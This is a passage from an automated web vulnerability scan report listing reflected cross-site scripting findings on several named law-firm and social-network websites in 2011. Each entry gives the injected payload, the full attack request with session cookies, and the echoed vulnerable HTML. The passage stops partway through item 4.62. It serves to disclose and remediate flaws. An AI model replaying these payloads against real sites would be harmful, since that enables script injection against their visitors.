Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /jscripts.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5971b'a%3d'b'00ef94682dd was submitted in the REST URL parameter 1. This input was echoed as 5971b'a='b'00ef94682dd in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /jscripts.js5971b'a%3d'b'00ef94682dd HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
Referer: http://www.faegre.co.uk/showlocation.aspx?Show=59
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:07:42 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21837


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/jscripts.js5971b'a='b'00ef94682dd&Language=1' class='printhide'>
...[SNIP]...

4.49. http://www.faegre.co.uk/rankingawards [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /rankingawards

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1e227'a%3d'b'fc9443d5eba was submitted in the REST URL parameter 1. This input was echoed as 1e227'a='b'fc9443d5eba in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /rankingawards1e227'a%3d'b'fc9443d5eba HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response (redirected)

HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 18 Apr 2011 01:53:01 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21773


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/rankingawards1e227'a='b'fc9443d5eba&Language=1' class='printhide'>
...[SNIP]...

4.50. http://www.faegre.co.uk/rankingawards [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /rankingawards

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0ba0"><script>alert(1)</script>3b3f53be5d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rankingawards?f0ba0"><script>alert(1)</script>3b3f53be5d6=1 HTTP/1.1
Host: www.faegre.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57823037.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=57823037.1256793589.1303088795.1303088795.1303088795.1; ScreenHeight=1200; __utmc=57823037; __utmb=57823037.1.10.1303088795; ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib; ScreenWidth=1920;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:52:16 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 27013


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<meta property="og:url" content="http://www.faegre.co.uk/rankingawards?f0ba0"><script>alert(1)</script>3b3f53be5d6=1"/>
...[SNIP]...

4.51. http://www.faegre.co.uk/showlocation.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.faegre.co.uk
Path:   /showlocation.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dccab'a%3d'b'3ecfe53eaec was submitted in the REST URL parameter 1. This input was echoed as dccab'a='b'3ecfe53eaec in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /showlocation.aspxdccab'a%3d'b'3ecfe53eaec?Show=59 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib

Response (redirected)

HTTP/1.1 404 Not Found
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:08:11 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 21879


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='404.aspx?aspxerrorpath=/showlocation.aspxdccab'a='b'3ecfe53eaec&Language=1' class='printhide'>
...[SNIP]...

4.52. http://www.faegre.co.uk/showlocation.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /showlocation.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 933ee--><script>alert(1)</script>62c0f821c24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /showlocation.aspx?Show=59&933ee--><script>alert(1)</script>62c0f821c24=1 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:07:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 38235


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<!-- /showlocation.aspx?Show=59&933ee--><script>alert(1)</script>62c0f821c24=1 -->
...[SNIP]...

4.53. http://www.faegre.co.uk/showlocation.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /showlocation.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27f77"><script>alert(1)</script>dd90c38e8c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /showlocation.aspx?Show=59&27f77"><script>alert(1)</script>dd90c38e8c9=1 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:07:34 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 38228


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<meta property="og:url" content="http://www.faegre.co.uk/showlocation.aspx?Show=59&27f77"><script>alert(1)</script>dd90c38e8c9=1"/>
...[SNIP]...

4.54. http://www.faegre.co.uk/showlocation.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.faegre.co.uk
Path:   /showlocation.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3694'><script>alert(1)</script>9518c0ad2f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /showlocation.aspx?Show=59&f3694'><script>alert(1)</script>9518c0ad2f6=1 HTTP/1.1
Host: www.faegre.co.uk
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uoj0usmr33cyxs55xfb1njib

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Mon, 18 Apr 2011 01:07:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Length: 38223


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/f
...[SNIP]...
<a href='showlocation.aspx?Show=59&f3694'><script>alert(1)</script>9518c0ad2f6=1&Language=1' class='printhide'>
...[SNIP]...

4.55. http://www.friedfrank.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.friedfrank.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bd98"><a>d763519c72f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?5bd98"><a>d763519c72f=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 15:12:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSMOBILE=1;path=/
Set-Cookie: JSMOBILE=0;path=/
Set-Cookie: CFID=31359028;path=/
Set-Cookie: CFTOKEN=81108497;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<a href="index.cfm?5bd98"><a>d763519c72f=1&fontsize=1" class="linkWhite">
...[SNIP]...

4.56. http://www.friedfrank.com/index.cfm [more parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The value of the more request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83c9c"><a>23920438f4a was submitted in the more parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /index.cfm?pageID=42&itemID=729&more=183c9c"><a>23920438f4a HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:07:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<a href="index.cfm?pageID=42&itemID=729&more=183c9c"><a>23920438f4a&fontsize=1" class="linkWhite">
...[SNIP]...

4.57. http://www.friedfrank.com/index.cfm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1499e"><a>e4e0d068b9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /index.cfm?pageID=42&itemID=1175&1499e"><a>e4e0d068b9f=1 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:07:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSMOBILE=1;path=/
Set-Cookie: JSMOBILE=0;path=/
Set-Cookie: CFID=31350049;path=/
Set-Cookie: CFTOKEN=21144502;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<a href="index.cfm?pageID=42&itemID=1175&1499e"><a>e4e0d068b9f=1&fontsize=1" class="linkWhite">
...[SNIP]...

4.58. http://www.humaniplex.com/blogs/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /blogs/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e8053'><script>alert(1)</script>337ba0eeb0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogs/?e8053'><script>alert(1)</script>337ba0eeb0a=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.8.10.1303159302; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:48 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27279


<html>
<head>


<title>
HX - Blogs!
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.humaniplex.com/labels
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/blogs/?e8053'><script>alert(1)</script>337ba0eeb0a=1'>
...[SNIP]...

4.59. http://www.humaniplex.com/classifieds/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /classifieds/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1db1d'><script>alert(1)</script>a70fef5bec3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /classifieds/?1db1d'><script>alert(1)</script>a70fef5bec3=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.7.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:44:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:44:15 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 181324

<style type="text/css">

.spacer
{
   width: 20px;
}

.level_0
{
   display: block;
   text-align: left;
   text-decoration: none;
   font-family:arial;
   font-size:16px;
   color: #FFFFFF;
   border:
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/classifieds/?1db1d'><script>alert(1)</script>a70fef5bec3=1'>
...[SNIP]...

4.60. http://www.humaniplex.com/clubs/list [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /clubs/list

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ff3a1'><script>alert(1)</script>bef842c1ec5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clubs/listff3a1'><script>alert(1)</script>bef842c1ec5 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.7.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:49 GMT; path=/; domain=.humaniplex.com
Content-Length: 4644
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head>


<title>
Humaniplex.com (HX) - The Social Network
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="htt
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/clubs/listff3a1'><script>alert(1)</script>bef842c1ec5'>
...[SNIP]...

4.61. http://www.humaniplex.com/clubs/list [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /clubs/list

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a3bdb'><script>alert(1)</script>78c80f6d488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /clubs/list?a3bdb'><script>alert(1)</script>78c80f6d488=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.7.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:38 GMT; path=/; domain=.humaniplex.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25734


<html>
<head>


<title>
HX - Master Club List
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.humaniplex.
...[SNIP]...
<input type='hidden' name='fp_returnUrl' value='http://www.humaniplex.com/clubs/list?a3bdb'><script>alert(1)</script>78c80f6d488=1'>
...[SNIP]...

4.62. http://www.humaniplex.com/flirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.humaniplex.com
Path:   /flirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4577f'><script>alert(1)</script>f119a4c3c72 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flirts/?4577f'><script>alert(1)</script>f119a4c3c72=1 HTTP/1.1
Host: www.humaniplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_js=y; __utmz=20218529.1303159302.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); cookie_accepted_site_tos=1; 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; __utma=20218529.144380528.1303159302.1303159302.1303159302.1; __utmc=20218529; __utmb=20218529.6.10.1303159302

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 20:43:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 90drfjk34_s=AD639C23-160B-01C5-E80D-AA98AFDD12C4; expires=Tue, 17-Apr-2012 20:43:29 GMT; path=/; domain=.humaniplex.com
Content-Length: 5634
Connection: close
Content-Type: text/html; charset=UTF-8


<html>
<head>


<title>
HX - Doing some Flirting?
</title>

<link rel='stylesheet' type='text/css' href='http://www.humaniplex.com/main.css'>


<link rel="meta" href="http://www.humanip
...[SNIP]...
